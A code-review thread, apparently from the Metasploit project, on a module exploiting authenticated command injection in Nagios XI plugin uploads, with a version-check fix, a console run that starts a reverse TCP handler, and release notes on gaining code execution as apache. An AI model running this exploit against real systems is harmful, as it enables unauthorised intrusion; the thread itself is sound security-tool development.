2021-04-14 20:57 UTC, gwillcox-r7 commented
Alright so looks like I did find a small error which we may also have to fix in the previous PR I landed as well. In particular in the `check` function we do the following bit of code:

```
  nagios_version = nagios_xi_version(res_array[0])
    if nagios_version.nil?
      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
    end

    print_status("Target is Nagios XI with version #{nagios_version}")
    # check if the target is actually vulnerable
    @version = Rex::Version.new(nagios_version)
```

The problem with this is that depending on the release, `nagios_version` could also be a value of something like 2014R2.7, which results in an error when it gets passed to `Rex::Version.new()` which doesn't know how to handle this, resulting in cases like the following:

```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 172.25.33.151:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 2014R2.7
[-] Exploit failed: ArgumentError Malformed version number string 2014R2.7
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > 
```

2021-04-14 21:13 UTC, gwillcox-r7 commented
Exploit works brilliantly on a Nagios XI 5.5.6 target, will upload updated documentation shortly. Seems its just the issue mentioned above that I'll need to address.

2021-04-14 21:30 UTC, gwillcox-r7 commented
Alright I came up with this regex which should help prevent the issue above:

```
print_status("Target is Nagios XI with version #{nagios_version}")
    # check if the target is actually vulnerable
if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
    end
```

Note that cause of the print_status output though we will still print out the correct target version.

2021-04-14 21:57 UTC, gwillcox-r7 approved these changes

2021-04-14 21:59 UTC, merged

2021-04-14 22:03 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added to exploit CVE-2020-33578, an RCE in Nagios XI versions prior to 5.8.0 that exploits a command injection when uploading plugins to allow authenticated administrative users to gain remote code execution as the `apache` user on affected systems.